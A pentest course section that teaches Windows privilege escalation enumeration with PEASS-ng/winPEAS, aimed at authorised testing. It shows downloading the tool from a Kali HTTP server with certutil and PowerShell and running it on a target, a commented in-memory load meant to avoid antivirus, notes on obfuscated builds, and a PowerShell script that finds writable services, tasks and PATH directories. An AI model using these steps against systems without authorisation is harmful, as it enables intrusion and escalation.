# Course #437: Mastering peass-ng for Windows Privilege Escalation
## Section 5: Advanced Usage and Implementation of peass-ng
In this final section of the course we cover how to obtain PEASS-ng on Kali Linux, how to deliver its Windows component (winPEAS) to a target and run it there, and how to read and manually confirm what it reports. The essential point to keep in mind throughout: winPEAS is an enumeration tool that runs on the Windows host you are assessing, not on Kali. It lists candidate privilege escalation vectors; verifying and exploiting them is your job as the pentester.
### 1. Installation and Configuration of peass-ng on Kali Linux
PEASS-ng (Privilege Escalation Awesome Scripts SUITE new generation) is a set of enumeration scripts by Carlos Polop that automate the information-gathering phase of local privilege escalation. For Windows the relevant components are winPEAS.exe, a C# program that needs .NET Framework 4.x on the target and ships prebuilt as winPEASany.exe, winPEASx64.exe and winPEASx86.exe, and winPEAS.bat, a reduced batch-file version for hosts without .NET. The tool exploits nothing: it prints what it finds, colour-coding the items most likely to be exploitable, and the exploitation step is yours. Staging the right binary correctly is the first step.
#### 1.1. Prerequisites
Before obtaining winPEAS, ensure you have the following:
– A Kali Linux installation (preferably the latest version) with internet access for downloading the package or the repository.
– A Windows host you are authorised to test, on which you already hold a low-privileged shell, and a network path from that host back to Kali for the file transfer.
– Basic command-line knowledge on both sides: bash on Kali, cmd or PowerShell on the target.
#### 1.2. Installation Steps
1. **Open Terminal**: Start your Kali Linux terminal.
2. **Update Package List**: It’s a good practice to ensure your package list is up to date. Run the following command:
sudo apt update && sudo apt upgrade -y
3. **Install the Kali package (simplest route)**: Kali ships PEASS-ng as the `peass` package. The Windows files land in /usr/share/peass/winpeas/ (linpeas.sh sits next to them under /usr/share/peass/linpeas/):
sudo apt install peass -y
ls /usr/share/peass/winpeas/
4. **Or clone the upstream repository**: install git if it is missing (`sudo apt install git -y`), then clone. The project moved from carlospolop/privilege-escalation-awesome-scripts-suite to the peass-ng organisation; the old URL redirects, but use the current one:
git clone https://github.com/peass-ng/PEASS-ng.git
cd PEASS-ng/winPEAS
5. **Get the prebuilt binaries**: winPEAS.exe is a C# program, so there is no requirements.txt and nothing to `pip install`. Building it yourself needs Visual Studio or the .NET SDK on a Windows machine; for normal use download the binaries attached to each release (the same files the Kali package installs):
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany.exe
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEAS.bat
6. **Executable bits are irrelevant here**: the Windows files are executed on the target, not on Kali, so `chmod +x` only matters for linpeas.sh if you also use it.
7. **Sanity-check what you downloaded**: a failed download often leaves an HTML error page with the right file name. Confirm you have a PE file before shipping it to a target:
file winPEASany.exe
The expected answer contains "PE32 executable" and "Mono/.Net assembly". Expect Microsoft Defender on the target to detect the plain binary: the `*_ofs.exe` files in the same release are obfuscated builds for that case, and winPEAS.bat is the fallback for hosts without .NET Framework 4.x.
### 2. Step-by-Step Usage of peass-ng
Now that the binaries are on Kali, let’s look at how winPEAS is actually run. It runs on the Windows target, under the account whose escalation paths you want to see.
#### 2.1. Overview of the Tool Structure
The PEASS-ng repository is organised by platform rather than by technique:
– **linPEAS/**: the Linux/macOS script (not covered in this course).
– **winPEAS/winPEASexe/**: the C# source of winPEAS.exe and its prebuilt binaries. winPEASany.exe picks the right architecture at run time, winPEASx64.exe and winPEASx86.exe are fixed to one; the `*_ofs.exe` variants are obfuscated builds.
– **winPEAS/winPEASbat/**: winPEAS.bat, a reduced batch-file version for targets without .NET Framework 4.x.
There is no `peass-ng.sh` entry point and nothing to run on Kali: the checks are grouped inside the binary and selected with command-line arguments.
#### 2.2. Running winPEAS
1. **Transfer the binary to the target**: serve the staging directory from Kali with `python3 -m http.server 8000` and fetch the file on the target, for example from cmd:
certutil -urlcache -split -f http://<kali-ip>:8000/winPEASany.exe winPEASany.exe
2. **There is no environment prompt**: winPEAS collects the OS version and patch level itself as part of its system checks and never asks you to choose a Windows edition. With no arguments it runs every check:
winPEASany.exe
3. **Select checks with arguments** rather than menus. Check groups are named after what they enumerate (for example `systeminfo`, `userinfo`, `processinfo`, `servicesinfo`, `applicationsinfo`, `networkinfo`, `windowscreds`, `filesinfo`), `quiet` drops the banner, and `winPEASany.exe -h` prints the full list for the build you have. A quick first pass and a full pass:
winPEASany.exe quiet systeminfo userinfo servicesinfo
winPEASany.exe quiet
4. **Save Output**: redirect to a file, adding `notcolor` so the file contains no ANSI escape sequences, and copy it back to Kali for analysis:
winPEASany.exe quiet notcolor > winpeas.txt
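The transfer-and-run sequence above, as an added PowerShell example that is not part of PEASS-ng or its documentation. It assumes Kali is reachable at 10.10.14.5 and is serving the staging directory with `python3 -m http.server 8000`, and that the target has .NET Framework 4.x; the address, the `wp` working directory and the output file names are this example's own choices.

```powershell
# Added example, not from PEASS-ng: pull winPEAS from the Kali staging server,
# run it on the target and keep a clean copy of the output for analysis.
# Assumptions: Kali serves the binary at http://10.10.14.5:8000 (python3 -m
# http.server 8000) and the target has .NET Framework 4.x.
$Kali = 'http://10.10.14.5:8000'
$work = Join-Path $env:TEMP 'wp'
New-Item -ItemType Directory -Force -Path $work | Out-Null
$exe = Join-Path $work 'winPEASany.exe'
Invoke-WebRequest -Uri "$Kali/winPEASany.exe" -OutFile $exe -UseBasicParsing

# Colour highlighting (red = most likely exploitable) only renders in the classic
# console once this per-user setting is on; the winPEAS README gives the same REG ADD.
New-ItemProperty -Path HKCU:\Console -Name VirtualTerminalLevel -PropertyType DWORD -Value 1 -Force | Out-Null

# One full run: shown on screen and saved to a file. `notcolor` keeps escape
# sequences out of the file; drop it if you prefer the colour-coded view and
# will strip the codes on Kali instead.
& $exe quiet notcolor 2>&1 | Tee-Object -FilePath (Join-Path $work 'winpeas_full.txt')

# Re-run just the service checks while investigating a finding from the full run.
& $exe quiet notcolor servicesinfo 2>&1 | Out-File (Join-Path $work 'winpeas_services.txt')

# If writing the exe to disk trips the AV, load the .NET assembly straight into
# memory instead (the same technique the winPEAS README documents):
# $bytes = (Invoke-WebRequest "$Kali/winPEASany.exe" -UseBasicParsing).Content
# [System.Reflection.Assembly]::Load([byte[]]$bytes) | Out-Null
# [winPEAS.Program]::Main([string[]]@('quiet', 'servicesinfo'))
```

Copy `winpeas_full.txt` back to Kali (for instance with a reverse `Invoke-WebRequest -Method Post`, an SMB share, or simply by pasting) and grep it there; a full run takes several minutes on a busy host, so do not repeat it for every question.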
#### 2.3. Real-World Use Cases
Understanding how to apply winPEAS in real scenarios is crucial. The workflow is the same in both examples below: run winPEAS as the low-privileged user, read the items it highlights in red, then confirm each one by hand before building an exploit on it, because the tool reports conditions, not guaranteed vulnerabilities.
##### Use Case 1: Local Privilege Escalation via Weak ACLs
A user has limited permissions on a Windows machine and you need administrative access. Run the user and file checks:
1. Execute the following command:
winPEASany.exe quiet userinfo filesinfo
2. Analyze the output for files or directories that your user, or a group you belong to (Authenticated Users, Everyone, BUILTIN\Users), can write to and that a higher-privileged process later reads or executes: application directories under Program Files, binaries launched by scheduled tasks, startup folders, scripts run at logon. Confirm the ACL with `icacls <path>` before acting on it; a usable hit needs both the write permission and a privileged consumer of the file.
##### Use Case 2: Service Misconfigurations
Services running as LocalSystem are a classic vector. The `servicesinfo` checks report, among other things:
1. Services whose ImagePath is unquoted and contains spaces, so the service control manager may try `C:\Program.exe` or `C:\Program Files\Foo.exe` before the real binary; exploitable only if one of those intermediate directories is writable by you.
2. Service binaries, or the directories holding them, that your user can modify (binary replacement or DLL planting).
3. Services whose configuration you may change (write access on the service object, or on its key under HKLM\SYSTEM\CurrentControlSet\Services), letting you repoint the binary path.
Run only the service checks with:
winPEASany.exe quiet servicesinfo
The output lists each service with its account, start mode, path and the permissions it found. A finding is only usable if you can also get the service restarted: you hold start/stop rights on it, it starts at boot and you can reboot, or it restarts automatically after a crash. Check `sc qc <name>` and `sc sdshow <name>` for the start mode and the service's security descriptor.
#### 2.4. Advanced Configuration Options
winPEAS is driven entirely by command-line arguments; it reads no configuration file and no environment variables:
– **Custom checks**: winPEAS.exe is compiled C#, so adding a check means editing the source under winPEAS/winPEASexe and rebuilding; there is no plug-in directory to drop scripts into. For a quick one-off check on a target, script it in PowerShell next to the winPEAS run instead.
– **Scope and speed**: the per-category names above limit a run to what you need; `searchfast` skips the pauses the file search inserts to stay quiet (faster, heavier on the host), and `domain` adds Active Directory enumeration on domain-joined hosts.
– **Debug and log output**: `debug` prints timing and memory usage per check, and `log` (or `log=<file>`) copies the output to a file on the target; plain shell redirection does the same with less to clean up afterwards.
Run `winPEASany.exe -h` to see the exact option names of your build, since they change between releases.
### 3. Detailed Technical Explanations
Understanding the underlying technology and concepts is vital for effective pentesting. Here are some key areas to focus on:
#### 3.1. Windows Privilege Escalation Techniques (and where winPEAS surfaces them)
– **Token privileges and impersonation**: a token carries privileges as well as group memberships. SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege, typical for service accounts such as IIS or MSSQL, let you impersonate a SYSTEM token obtained from a coerced authentication, which is what the Potato family of tools does; SeBackupPrivilege/SeRestorePrivilege, SeDebugPrivilege and SeTakeOwnershipPrivilege give other routes. winPEAS's `userinfo` lists the current token's privileges (`whoami /priv` shows the same).
– **DLL Hijacking**: a privileged process that loads a DLL by name searches its own directory and then the PATH; if any of those directories is writable by you, you can plant the DLL and it runs with the process's privileges. winPEAS flags writable PATH entries and writable directories of service binaries.
– **Scheduled Tasks**: a task that runs as SYSTEM (or another user) whose action binary you can overwrite, or whose task definition you can edit, runs your code at its next trigger. winPEAS lists tasks with their principals and actions; `schtasks /query /fo LIST /v` or Get-ScheduledTask gives the detail.
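The checks behind both use cases in 2.3 and the three techniques above, re-implemented in plain PowerShell as an added example (this is not code from PEASS-ng). Use it on the target, as the low-privileged user, to confirm a winPEAS finding by hand. All function names, the write-rights mask and the privilege list are this example's own choices.

```powershell
# Added example, not part of PEASS-ng: plain-PowerShell versions of a subset of
# the checks winPEAS reports (writable paths, service and scheduled-task
# weaknesses, PATH hijack candidates, token privileges). Run as the
# low-privileged user under assessment; from an elevated shell everything
# looks writable. Names, mask and privilege list are this example's own.

$me = [Security.Principal.WindowsIdentity]::GetCurrent()
# SIDs an ACE must name for "we can write this": our user plus every group and
# token membership (Everyone, Authenticated Users, BUILTIN\Users, ...).
$script:MySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })

# Rights that let us change content, ACL or owner, plus the generic write/all
# bits some ACEs carry instead of specific rights (assumed set of bits).
$script:WriteMask = 0x2 -bor 0x4 -bor 0x40000 -bor 0x80000 -bor 0x40000000 -bor 0x10000000

function Test-WritableByMe {
    # True if an Allow ACE grants one of our SIDs a write-class right and no Deny
    # ACE for one of our SIDs takes it back (conservative: any matching Deny wins).
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    $allowed = $false
    foreach ($ace in $acl.Access) {
        try { $sid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if ($script:MySids -notcontains $sid) { continue }
        if (($ace.FileSystemRights.value__ -band $script:WriteMask) -eq 0) { continue }
        if ($ace.AccessControlType -eq 'Deny') { return $false }
        $allowed = $true
    }
    return $allowed
}

function Get-ImagePathExe {
    # Pull the executable out of a command line: "C:\a b\x.exe" -f, or C:\a b\x.exe -f.
    param([string]$CommandLine)
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine)
    if ($cmd -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($cmd -match '^\s*(\S.*?\.exe)') { return $Matches[1] }
    return ($cmd -split '\s+')[0]
}

function Find-ServiceWeaknesses {
    # The three conditions the servicesinfo checks flag most often.
    foreach ($svc in Get-CimInstance Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe = Get-ImagePathExe $svc.PathName
        $issues = @()
        if ($svc.PathName -notmatch '^\s*"' -and $exe -match ' ') {
            # Unquoted path with spaces: SCM probes C:\Program.exe, C:\Program Files\Foo.exe, ...
            $parts = $exe -split '\\'; $prefix = $parts[0]
            for ($i = 1; $i -lt $parts.Count; $i++) {
                if ($parts[$i] -match ' ' -and (Test-WritableByMe ($prefix + '\'))) { $issues += "unquoted path, can drop a binary in $prefix\" }
                $prefix = "$prefix\$($parts[$i])"
            }
        }
        $dir = Split-Path $exe -Parent
        if (Test-WritableByMe $exe) { $issues += 'service binary writable' }
        elseif ($dir -and (Test-WritableByMe $dir)) { $issues += 'binary directory writable (DLL planting)' }
        if ($issues) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Start = $svc.StartMode; Binary = $exe; Issues = ($issues -join '; ') }
        }
    }
}

function Find-ScheduledTaskWeaknesses {
    # Tasks whose action binary we can overwrite run our code as the task principal.
    foreach ($task in Get-ScheduledTask | Where-Object State -ne 'Disabled') {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }
            $exe = Get-ImagePathExe $action.Execute
            if (Test-WritableByMe $exe) {
                [pscustomobject]@{ Task = $task.TaskPath + $task.TaskName; RunsAs = $task.Principal.UserId; Binary = $exe }
            }
        }
    }
}

function Find-WritablePathDirs {
    # Machine-scope PATH only: a directory you put in your own user PATH is not a finding.
    [Environment]::GetEnvironmentVariable('Path', 'Machine') -split ';' |
        Where-Object { $_ -and (Test-WritableByMe $_) }
}

function Get-InterestingPrivileges {
    # Privileges with a well-known path to SYSTEM; same data winPEAS userinfo / whoami show.
    $wanted = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeBackupPrivilege', 'SeRestorePrivilege',
              'SeDebugPrivilege', 'SeTakeOwnershipPrivilege', 'SeLoadDriverPrivilege', 'SeManageVolumePrivilege'
    whoami /priv /fo csv | ConvertFrom-Csv | Where-Object { $wanted -contains $_.'Privilege Name' }
}

'== Services ==';           Find-ServiceWeaknesses | Format-Table -AutoSize
'== Scheduled tasks ==';    Find-ScheduledTaskWeaknesses | Format-Table -AutoSize
'== Writable PATH dirs =='; Find-WritablePathDirs
'== Token privileges ==';   Get-InterestingPrivileges | Format-Table -AutoSize
```

Get-ScheduledTask needs Windows 8 / Server 2012 or later; on older hosts use `schtasks /query /fo CSV /v` and feed its "Task To Run" column to Test-WritableByMe. An "Issues" hit on a service still has to be paired with a way to restart it (see Use Case 2) before it is a working escalation.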
#### 3.2. External References
– [PEASS-ng repository and winPEAS README](https://github.com/peass-ng/PEASS-ng): option list, build instructions, in-memory loading.
– [HackTricks: Windows Local Privilege Escalation](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation): the checklist by the same author that winPEAS's checks follow.
– [MITRE ATT&CK, Privilege Escalation tactic (TA0004)](https://attack.mitre.org/tactics/TA0004/)
– [Microsoft Security Documentation](https://docs.microsoft.com/en-us/security/)
– [SANS Penetration Testing Resources](https://www.sans.org/)
### 4. Code Examples
Below are some code snippets to illustrate how you can set up and run peass-ng effectively for Windows privilege escalation.
#### 4.1. Basic Script Example
Here’s a Kali-side script that stages the winPEAS files from the `peass` package in a web root and serves them to the target; the checks themselves run on the Windows host as shown in section 2:
```bash
#!/bin/bash
# Stage winPEAS (from the Kali `peass` package) in a web root and serve it to the target.
set -euo pipefail
SRC=/usr/share/peass/winpeas
mkdir -p ~/www
cp "$SRC/winPEASany.exe" "$SRC/winPEAS.bat" ~/www/
cd ~/www
echo "Serving $(ls) from $(pwd) on port 8000; on the target: certutil -urlcache -split -f http://<kali-ip>:8000/winPEASany.exe"
python3 -m http.server 8000
```
#### 4.2. Custom Enumeration Script
The simplest custom check is a writability test on files that only an administrator should be able to change. The Linux form is shown here for contrast (on a Linux target this is linPEAS territory); on Windows the same test is `icacls <file>` or PowerShell's Get-Acl, and winPEAS's `filesinfo` performs it for you:
```bash
#!/bin/bash
# Report sensitive files the current user can write to (should normally be none).
for f in /etc/passwd /etc/shadow /etc/sudoers; do
    if [ -w "$f" ]; then
        echo "Weak permissions: $f is writable by $(id -un)"
    fi
done
```
### Conclusion
In this section of the course we have covered how to obtain PEASS-ng on Kali, deliver winPEAS to a Windows target, run it with the right options, and confirm what it reports. By understanding its checks and applying them to real scenarios, you can enhance your pentesting capabilities and turn the candidate vectors winPEAS points at into verified privilege escalation paths.
Make sure to continuously practice and update your knowledge, as cybersecurity is an ever-evolving field. Utilize the provided external resources and experiment with different scenarios to gain practical experience.
**Congratulations on completing Course #437: Mastering peass-ng for Windows Privilege Escalation! You are now equipped with valuable tools and knowledge to further your career in pentesting and cybersecurity.**
—
Made by pablo rotem / פבלו רותם